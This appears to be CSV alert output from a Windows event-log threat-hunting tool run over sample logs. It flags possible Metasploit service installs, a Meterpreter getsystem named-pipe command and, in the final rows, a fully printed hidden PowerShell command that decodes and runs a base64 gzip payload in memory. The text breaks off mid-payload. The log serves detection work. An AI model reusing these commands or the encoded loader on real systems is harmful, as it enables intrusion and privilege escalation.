2016-08-19 04:55:52.364 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 04:55:53.255 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xbc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 04:55:57.149 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xa5c | User: IEUser | LID: 0x1ceaf",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 04:55:57.542 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xa7c | User: IEUser | LID: 0x1ceaf,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 04:55:59.915 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb1c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 04:56:34.967 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdac | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 04:56:34.999 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdd0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 04:58:48.497 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xce4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 04:58:48.512 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{A4B07E49-6567-4FB8-8D39-01920E3B2357} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd14 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 04:59:33.224 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: IixaZHzxvTaopUGI | Path: %SYSTEMROOT%\ijQzlbXC.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 04:59:33.224 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: IixaZHzxvTaopUGI | Path: %SYSTEMROOT%\ijQzlbXC.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 04:59:33.224 +09:00,IE10Win7,7045,info,,New Service Installed,Name: IixaZHzxvTaopUGI | Path: %SYSTEMROOT%\ijQzlbXC.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 05:00:43.879 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfc0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 05:00:43.910 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x674 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 05:03:18.175 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: yagfag | Path: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 05:03:18.175 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: yagfag | Path: cmd.exe /c echo yagfag > \\.\pipe\yagfag,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 05:03:18.175 +09:00,IE10Win7,7045,info,,New Service Installed,Name: yagfag | Path: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 05:03:18.175 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Path: C:\Windows\System32\cmd.exe | PID: 0x57c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleMeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 05:03:18.175 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Path: C:\Windows\System32\cmd.exe | PID: 0x57c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 05:04:19.379 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: XCKcRAHmHLAkajXO | Path: %SYSTEMROOT%\kAtEspLd.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 05:04:19.379 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: XCKcRAHmHLAkajXO | Path: %SYSTEMROOT%\kAtEspLd.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 05:04:19.379 +09:00,IE10Win7,7045,info,,New Service Installed,Name: XCKcRAHmHLAkajXO | Path: %SYSTEMROOT%\kAtEspLd.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 05:08:53.832 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x274 | User: IEUser | LID: 0x1d069",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 05:10:06.597 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: mHPhVsrnnbYuDOWj | Path: %SYSTEMROOT%\AFDvMJdc.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 05:10:06.597 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: mHPhVsrnnbYuDOWj | Path: %SYSTEMROOT%\AFDvMJdc.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 05:10:06.597 +09:00,IE10Win7,7045,info,,New Service Installed,Name: mHPhVsrnnbYuDOWj | Path: %SYSTEMROOT%\AFDvMJdc.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 05:11:24.391 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: VdhURnHArteGncWS | Path: %SYSTEMROOT%\dQGFdDtG.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 05:11:24.391 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: VdhURnHArteGncWS | Path: %SYSTEMROOT%\dQGFdDtG.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 05:11:24.391 +09:00,IE10Win7,7045,info,,New Service Installed,Name: VdhURnHArteGncWS | Path: %SYSTEMROOT%\dQGFdDtG.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 05:12:53.344 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: GWRhKCtKcmQarQUS | Path: %SYSTEMROOT%\frlCVwVW.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 05:12:53.344 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: GWRhKCtKcmQarQUS | Path: %SYSTEMROOT%\frlCVwVW.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 05:12:53.344 +09:00,IE10Win7,7045,info,,New Service Installed,Name: GWRhKCtKcmQarQUS | Path: %SYSTEMROOT%\frlCVwVW.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 05:14:12.922 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: riddDteHwMfqxVOk | Path: %SYSTEMROOT%\GbzflpZs.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 05:14:12.922 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: riddDteHwMfqxVOk | Path: %SYSTEMROOT%\GbzflpZs.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 05:14:12.922 +09:00,IE10Win7,7045,info,,New Service Installed,Name: riddDteHwMfqxVOk | Path: %SYSTEMROOT%\GbzflpZs.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 05:16:40.574 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc94 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 05:16:40.574 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x754 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 05:16:40.605 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xad4 | User: IEUser | LID: 0x1ceaf",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 05:22:36.074 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: JDFZBLLIkXqjccos | Path: %SYSTEMROOT%\zqvbnLTK.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 05:22:36.074 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: JDFZBLLIkXqjccos | Path: %SYSTEMROOT%\zqvbnLTK.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 05:22:36.074 +09:00,IE10Win7,7045,info,,New Service Installed,Name: JDFZBLLIkXqjccos | Path: %SYSTEMROOT%\zqvbnLTK.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 05:24:48.043 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: tLVOxEmULrqimOQr | Path: %SYSTEMROOT%\tnKMiZjQ.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 05:24:48.043 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: tLVOxEmULrqimOQr | Path: %SYSTEMROOT%\tnKMiZjQ.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 05:24:48.043 +09:00,IE10Win7,7045,info,,New Service Installed,Name: tLVOxEmULrqimOQr | Path: %SYSTEMROOT%\tnKMiZjQ.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: SYyGmEHvgHiGYApk | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: SYyGmEHvgHiGYApk | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: SYyGmEHvgHiGYApk | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5